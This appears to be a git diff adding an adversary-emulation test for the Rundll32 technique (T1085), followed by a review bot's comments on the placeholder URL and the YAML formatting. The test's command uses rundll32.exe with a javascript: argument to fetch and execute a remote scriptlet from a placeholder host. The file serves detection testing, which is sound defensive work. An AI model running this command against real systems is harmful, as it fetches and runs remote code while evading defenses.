diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+ description: |
+ Test execution of a remote script using rundll32.exe
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_url:
+ description: location of the payload
+ type: Url
+ default: https://www.example.com/1085.sct
+ executor:
+ name: command_prompt
+ command: |
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
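Review bot: The default `file_url` of `https://www.example.com/1085.sct` points at the reserved example domain, so the test as committed cannot fetch anything and will fail unless the runner overrides the argument, yet the one-line description does not say so. Expand the description to state the prerequisite and the artifacts a detection engineer should expect when validating coverage, e.g. `Requires a host you control serving the .sct file; the default URL is a placeholder and must be overridden via file_url. Expected artifacts: a rundll32.exe process whose command line starts with a javascript: argument, followed by an outbound request to file_url.` The `description` and `command` block scalars use `|`, which keeps a trailing newline; `|-` is the usual choice when that newline is not wanted.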